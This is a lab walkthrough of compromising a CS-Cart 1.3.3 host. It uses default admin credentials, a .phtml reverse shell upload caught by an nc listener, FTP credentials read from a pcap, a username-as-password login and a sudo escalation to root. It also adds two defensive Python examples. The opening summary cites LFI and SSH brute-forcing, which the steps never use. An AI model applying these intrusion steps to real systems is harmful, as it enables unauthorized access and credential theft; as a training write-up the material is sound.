Machine Info

Spoiler
In this lab, Learners exploit a Local File Inclusion (LFI) vulnerability in the CS-Cart application to access sensitive system files and uncover critical usernames. Using the retrieved information, Learners will brute-force SSH credentials to gain access to the system and escalate privileges to root using a sudo misconfiguration. This exercise enhances skills in web application exploitation, brute-forcing, and privilege escalation.

User

Reconnaissance

We are going to start by running our nmap scan:

# collect every open TCP port from a full-range scan into a comma-separated list for the second, scripted scan
ports=$(nmap -p- --min-rate=1000 -T4 "$VICTIM" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

Running second nmap scan with open ports: 22,80,110,139,143,445,993,995
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-09 20:43 CET
Nmap scan report for $VICTIM
Host is up (0.032s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL TOP UIDL CAPA PIPELINING RESP-CODES STLS
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-03-09T19:44:11+00:00; +24s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ssl-date: 2026-03-09T19:44:13+00:00; +24s from scanner time.
|_imap-capabilities: IMAP4rev1 Capability LOGIN-REFERRALS completed SASL-IR LOGINDISABLEDA0001 UNSELECT LITERAL+ IDLE STARTTLS OK NAMESPACE MULTIAPPEND CHILDREN THREAD=REFERENCES SORT
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imap    Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3    Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_ssl-date: 2026-03-09T19:44:11+00:00; +24s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|WAP|broadband router|webcam|firewall
Running (JUST GUESSING): Linux 2.6.X|3.X (96%), Asus embedded (95%), AXIS embedded (95%), WatchGuard embedded (95%), Linksys embedded (94%), Cisco embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/h:watchguard:firebox_x1250e cpe:/h:linksys:wrv54g
Aggressive OS guesses: Linux 2.6.32 - 3.10 (96%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (95%), Asus RT-AC66U router (Linux 2.6) (95%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (95%), Asus RT-N16 WAP (Linux 2.6) (95%), Asus RT-N66U WAP (Linux 2.6) (95%), Tomato 1.28 (Linux 2.6.22) (95%), WatchGuard FireBox X1250e firewall (95%), Linux 2.6.16 (94%), Linksys WRV54G WAP (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: PAYDAY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2026-03-09T15:44:04-04:00
|_clock-skew: mean: 48m25s, deviation: 1h47m22s, median: 23s

CS-Cart

On port 80 we have CS-Cart, an eCommerce platform with multiple options to explore on the website. At first we tried registering a new user, and it worked.

As always, we also perform directory enumeration.

└─$ ffuf -u http://$VICTIM/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -r  


Thumbs.db               [Status: 200, Size: 1, Words: 1, Lines: 2, Duration: 20ms]
admin                   [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 80ms]
admin.php               [Status: 200, Size: 9483, Words: 393, Lines: 263, Duration: 104ms]
addons                  [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 75ms]
catalog                 [Status: 200, Size: 716, Words: 41, Lines: 14, Duration: 21ms]
cgi-bin/                [Status: 403, Size: 308, Words: 22, Lines: 11, Duration: 42ms]
chart                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 167ms]
classes                 [Status: 200, Size: 2174, Words: 137, Lines: 22, Duration: 301ms]
.htpasswd               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 3078ms]
.hta                    [Status: 403, Size: 304, Words: 22, Lines: 11, Duration: 3079ms]
config                  [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 88ms]
core                    [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 76ms]
.htaccess               [Status: 403, Size: 309, Words: 22, Lines: 11, Duration: 4063ms]
image                   [Status: 200, Size: 1971, Words: 16, Lines: 12, Duration: 111ms]
init                    [Status: 200, Size: 13, Words: 2, Lines: 1, Duration: 22ms]
index.php               [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 99ms]
include                 [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 72ms]
install                 [Status: 200, Size: 7731, Words: 346, Lines: 220, Duration: 93ms]
index                   [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 202ms]
images                  [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 174ms]
payments                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 84ms]
prepare                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 26ms]
server-status           [Status: 403, Size: 313, Words: 22, Lines: 11, Duration: 30ms]
skins                   [Status: 200, Size: 1287, Words: 77, Lines: 17, Duration: 119ms]
store_closed            [Status: 200, Size: 575, Words: 44, Lines: 16, Duration: 53ms]
var                     [Status: 200, Size: 28074, Words: 1558, Lines: 676, Duration: 69ms]

We see many interesting 200 responses but we focus on the admin page. When trying “default credentials” we manage to actually authenticate as admin.

admin creds
admin:admin

We have successfully authenticated and we take a bit of time to browse the options that the admin has. We do see options to upload files and backup the database. We also find the version of the website which is 1.3.3.

Looking it up online we see a popular authenticated RCE for CS-Cart 1.3.3. We will jump straight to the exploit. To exploit this we need a PHP shell and we upload it through the Template editor. The .php extension is not allowed, so we use .phtml instead. We are going to use a PHP reverse shell from revshells.com.

After we upload it we start up our listener and we move to http://[victim]/skins/rev.phtml to trigger it.

└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [$ATTACKER] from (UNKNOWN) [$VICTIM] 55175
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 16:08:20 up 28 min,  0 users,  load average: 0.00, 0.02, 0.21
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: no job control in this shell
www-data@payday:/$

www-data@payday:/$ cd home
cd home
www-data@payday:/home$ ls
ls
patrick
www-data@payday:/home$ cd patrick
cd patrick
www-data@payday:/home/patrick$ ls
ls
local.txt

That gives us a shell, and we can read local.txt.
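The upload step above turns on one detail: the template editor only rejected the exact `.php` extension, so a `.phtml` file, which Apache hands to the same PHP handler, went straight through. The following is an added example, not code from the write-up or from CS-Cart: a small Python module that puts the kind of denylist check described above beside an allowlist check, and a helper that lists which accepted names the server would still execute. `DENYLIST` models the check described on the page; `ALLOWLIST` and `SERVER_EXECUTES` are constructed assumptions for the illustration (a real deployment has to be checked against its own handler configuration).

```python
"""Upload-filename validation: a denylist beside an allowlist (added example).

DENYLIST models the check the write-up describes (".php is not allowed"); the
ALLOWLIST and SERVER_EXECUTES sets are constructed assumptions for illustration.
"""
import posixpath

# Extensions a typical Apache + mod_php setup maps to the PHP handler (assumption;
# the authoritative list is whatever the server's AddHandler/AddType lines say).
SERVER_EXECUTES = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}

DENYLIST = {".php"}                            # the only extension the weak check rejects
ALLOWLIST = {".tpl", ".html", ".css", ".js"}   # constructed: what a template editor should need


def executable(filename):
    """True if any extension in the name is one the server maps to PHP.

    Apache's mod_mime treats every dot-separated part as an extension, so a name
    like rev.php.html can still run as PHP on a server that uses AddHandler.
    """
    parts = posixpath.basename(filename).lower().split(".")[1:]
    return any("." + p in SERVER_EXECUTES for p in parts)


def denylist_allows(filename):
    """Weak check: reject only an exact, case-sensitive match of a known-bad extension."""
    return posixpath.splitext(filename)[1] not in DENYLIST


def allowlist_allows(filename):
    """Hardened check: one lower-cased extension from a fixed allowlist, nothing else."""
    name = posixpath.basename(filename)        # drop any directory part the client supplied
    if name.startswith(".") or name.count(".") != 1:
        return False                            # no dotfiles, no double extensions (a.php.html)
    stem, ext = posixpath.splitext(name)
    return bool(stem) and ext.lower() in ALLOWLIST


def bypasses(check):
    """Return the constructed test names that the given check accepts but the server would execute."""
    candidates = ["rev.phtml", "rev.PHP", "rev.php.html", "rev.php", "header.tpl", "../rev.phtml"]
    return [n for n in candidates if check(n) and executable(n)]


if __name__ == "__main__":
    print("accepted by the denylist yet executable:", bypasses(denylist_allows))
    print("accepted by the allowlist yet executable:", bypasses(allowlist_allows))
```

The denylist fails four different ways on the same six names (alternate extension, case, double extension, path component), while the allowlist rejects all of them and still accepts `header.tpl`. The point for the reviewer of an upload feature is that the shape of the check matters more than how long the list of bad extensions is.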

Root

Root Paranoia

Tip
At first we tried to establish an SSH connection with a key pair, but that was not possible: the home directory of the www-data user had overly permissive permissions, which the SSH service refuses when StrictModes is enabled.

We browsed around for a while and found the database credentials.

/var/www# cat config.php
cat config.php
<?php

//
// $Id: config.php 1822 2006-05-17 16:44:43Z
//

if ( !defined('IN_CSCART') ) { die('Access denied'); }

$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';

Furthermore, a local DB was indeed running and we were able to authenticate, but nothing interesting was found.

We then ran linpeas.sh and found that the /root directory was accessible, but we could neither read the flag nor find any key.

ls -al /root
ls -al /root
total 28
drwxr-xr-x  3 root root 4096 2026-03-10 06:35 .
drwxr-xr-x 21 root root 4096 2008-04-24 22:02 ..
-rw-------  1 root root    0 2020-09-03 08:57 .bash_history
-rw-r--r--  1 root root 2448 2016-04-19 03:51 .bashrc
-rw-r--r--  1 root root 2296 2017-03-30 03:28 capture.cap
-rw-r--r--  1 root root  141 2007-05-15 12:07 .profile
----------  1 root root   33 2026-03-10 06:35 proof.txt
drwxr-xr-x  2 root root 4096 2008-09-24 00:24 .ssh

We did, however, find a pcap file, which of course made sense to investigate.

Info
A PCAP file (Packet Capture) is a binary file format that stores raw network traffic packets.

www-data@payday:/root$ /usr/sbin/tcpdump -r capture.cap -X
reading from file capture.cap, link-type EN10MB (Ethernet)
.....
12:24:28.194032 IP 10.1.1.248.40909 > 10.11.1.220.ftp: P 1:13(12) ack 149 win 229 <nop,nop,timestamp 1849725 148456>
        0x0000:  4510 0040 f2b0 4000 4006 797a 0a01 01f8  E..@..@[email protected]....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c572 8194 9c33  ...........r...3
        0x0020:  8018 00e5 09ef 0000 0101 080a 001c 397d  ..............9}
        0x0030:  0002 43e8 5553 4552 2062 7265 7474 0d0a  ..C.USER.brett..
12:24:28.342433 IP 10.11.1.220.ftp > 10.1.1.248.40909: P 149:182(33) ack 13 win 258 <nop,nop,timestamp 148609 1849725>
        0x0000:  4500 0055 0e4e 4000 8006 1dd8 0a0b 01dc  E..U.N@.........
        0x0010:  0a01 01f8 0015 9fcd 8194 9c33 edcb c57e  ...........3...~
        0x0020:  8018 0102 b5b0 0000 0101 080a 0002 4481  ..............D.
        0x0030:  001c 397d 3333 3120 5061 7373 776f 7264  ..9}331.Password
        0x0040:  2072 6571 7569 7265 6420 666f 7220 6272  .required.for.br
        0x0050:  6574 740d 0a                             ett..
12:24:28.342540 IP 10.1.1.248.40909 > 10.11.1.220.ftp: . ack 182 win 229 <nop,nop,timestamp 1849762 148609>
        0x0000:  4510 0034 f2b1 4000 4006 7985 0a01 01f8  E..4..@[email protected].....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54  ...........~...T
        0x0020:  8010 00e5 b803 0000 0101 080a 001c 39a2  ..............9.
        0x0030:  0002 4481                                ..D.
12:24:30.985896 IP 10.1.1.248.40909 > 10.11.1.220.ftp: P 13:36(23) ack 182 win 229 <nop,nop,timestamp 1850423 148609>
        0x0000:  4510 004b f2b2 4000 4006 796d 0a01 01f8  E..K..@[email protected]....
        0x0010:  0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54  ...........~...T
        0x0020:  8018 00e5 6342 0000 0101 080a 001c 3c37  ....cB........<7
        0x0030:  0002 4481 5041 5353 2069 6c6f 7665 7365  ..D.PASS.ilovese
        0x0040:  6375 7269 7479 746f 6f0d 0a              curitytoo..
12:24:31.131666 IP 10.11.1.220.ftp > 10.1.1.248.40909: P 182:197(15) ack 36 win 258 <nop,nop,timestamp 148888 1850423>
        0x0000:  4500 0043 0e57 4000 8006 1de1 0a0b 01dc  E..C.W@.........
        0x0010:  0a01 01f8 0015 9fcd 8194 9c54 edcb c595  ...........T....
        0x0020:  8018 0102 a001 0000 0101 080a 0002 4598  ..............E.
        0x0030:  001c 3c37 3233 3020 4c6f 6767 6564 206f  ..<7230.Logged.o
        0x0040:  6e0d 0a                                  n..
.....

From our search we managed to get a set of credentials, specifically brett:ilovesecuritytoo, as we can see from the hex dump above. But we couldn't use them anywhere! This was a bit frustrating, to say the least.

Later, we explored many exploits, but none worked for us. The Linux kernel and much of the software were ancient, but nothing worked for our purposes since we didn't have any user password.

We tried many different ideas, but it seemed that we were stuck....

And then we saw in the linpeas output a hint to try the username as the password for all known users! So it basically gave us the idea of brute-forcing, but we first tried it for the patrick user, and it worked!
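Reading the FTP login out of the hex dump by eye works for a five-packet capture; on a real capture a network monitor does the same thing mechanically, which is why cleartext FTP shows up in IDS alerts. The script below is an added example, not part of the write-up and not a tool the author used: a pure-stdlib Python parser that reads a classic pcap, reassembles the client side of each FTP control channel and reports logins sent in the clear. The five IPv4 packets are transcribed from the tcpdump -X output above; the Ethernet headers, timestamps and pcap framing around them are constructed here so the script has a real capture to read offline. In the defender's spirit the report carries the username and only the length of the password.

```python
"""Flag cleartext FTP logins in a pcap (pure stdlib; added example).

The IPv4 packets below are transcribed from the tcpdump -X output in the
write-up (link-layer header stripped). The Ethernet headers, timestamps and
pcap framing are constructed so the parser has a .pcap to read offline.
"""
import struct

PACKETS_HEX = [
    # client -> server: USER brett
    "4510 0040 f2b0 4000 4006 797a 0a01 01f8 0a0b 01dc 9fcd 0015 edcb c572 8194 9c33"
    " 8018 00e5 09ef 0000 0101 080a 001c 397d 0002 43e8 5553 4552 2062 7265 7474 0d0a",
    # server -> client: 331 Password required for brett
    "4500 0055 0e4e 4000 8006 1dd8 0a0b 01dc 0a01 01f8 0015 9fcd 8194 9c33 edcb c57e"
    " 8018 0102 b5b0 0000 0101 080a 0002 4481 001c 397d 3333 3120 5061 7373 776f 7264"
    " 2072 6571 7569 7265 6420 666f 7220 6272 6574 740d 0a",
    # client -> server: bare ACK, no payload
    "4510 0034 f2b1 4000 4006 7985 0a01 01f8 0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54"
    " 8010 00e5 b803 0000 0101 080a 001c 39a2 0002 4481",
    # client -> server: PASS ...
    "4510 004b f2b2 4000 4006 796d 0a01 01f8 0a0b 01dc 9fcd 0015 edcb c57e 8194 9c54"
    " 8018 00e5 6342 0000 0101 080a 001c 3c37 0002 4481 5041 5353 2069 6c6f 7665 7365"
    " 6375 7269 7479 746f 6f0d 0a",
    # server -> client: 230 Logged on
    "4500 0043 0e57 4000 8006 1de1 0a0b 01dc 0a01 01f8 0015 9fcd 8194 9c54 edcb c595"
    " 8018 0102 a001 0000 0101 080a 0002 4598 001c 3c37 3233 3020 4c6f 6767 6564 206f"
    " 6e0d 0a",
]


def build_pcap(ip_packets, base_ts=1490847868):
    """Wrap raw IPv4 packets in constructed Ethernet frames inside a classic pcap (link type 1)."""
    eth = bytes.fromhex("001122334455 66778899aabb 0800")       # constructed MACs, ethertype IPv4
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # pcap global header
    for i, pkt in enumerate(ip_packets):
        assert struct.unpack("!H", pkt[2:4])[0] == len(pkt), "IP total length must match"
        frame = eth + pkt
        out += struct.pack("<IIII", base_ts + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_segments(pcap):
    """Yield (src, sport, dst, dport, payload) for every IPv4/TCP frame in a classic pcap."""
    magic = struct.unpack("<I", pcap[:4])[0]
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if struct.unpack("!H", frame[12:14])[0] != 0x0800:   # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6:                                        # not TCP
            continue
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield src, sport, dst, dport, tcp[data_off:]


def find_cleartext_ftp_logins(pcap):
    """Concatenate client->server FTP control traffic per flow and report USER/PASS lines.

    Segments are appended in capture order (assumes in-order delivery; a production
    tool would reassemble by sequence number). The password itself is not returned,
    only its length, which is all an alert needs.
    """
    streams = {}
    for src, sport, dst, dport, payload in iter_tcp_segments(pcap):
        if dport == 21 and payload:
            streams[(src, sport, dst)] = streams.get((src, sport, dst), b"") + payload
    findings = []
    for (src, sport, dst), data in streams.items():
        user, password = None, None
        for line in data.split(b"\r\n"):
            if line.upper().startswith(b"USER "):
                user = line[5:].decode("ascii", "replace")
            elif line.upper().startswith(b"PASS "):
                password = line[5:]
        if user is not None or password is not None:
            findings.append({"client": src, "server": dst, "user": user,
                             "password_len": len(password) if password is not None else 0})
    return findings


if __name__ == "__main__":
    capture = build_pcap([bytes.fromhex(h) for h in PACKETS_HEX])
    for f in find_cleartext_ftp_logins(capture):
        print(f"cleartext FTP login {f['client']} -> {f['server']}: user={f['user']!r}, "
              f"password sent in the clear ({f['password_len']} chars)")
```

Run against the transcribed packets it reports one flow, 10.1.1.248 to 10.11.1.220, user brett, 16-character password in the clear. The same parser reads any classic little- or big-endian pcap; only the FTP matching is protocol-specific, and the obvious extension is to add POP3 and IMAP `LOGIN` commands, which is exactly the exposure the nmap output at the top of this page shows for ports 110 and 143 when STARTTLS is not enforced.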

Patrick's password

www-data@payday:/tmp$ su patrick
su patrick
Password: patrick

patrick@payday:/tmp$

Here we paused a little bit to calm down as we had lost so much time on other attack paths whereas this one was stupid-simple. After two rabbit holes we got the intended one.

As the patrick user we can simply elevate our privileges to root, since sudo permits it.

patrick@payday:/tmp$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:patrick

User patrick may run the following commands on this host:
    (ALL) ALL
patrick@payday:/tmp$ sudo su 
sudo su 
root@payday:/tmp# cd /root
cd /root
root@payday:~# ls
ls
capture.cap  proof.txt
root@payday:~# cat proof.txt
cat proof.txt
<REDACTED>
root@payday:~# 

Tip
I guess the tip here is to never skip trying username = password....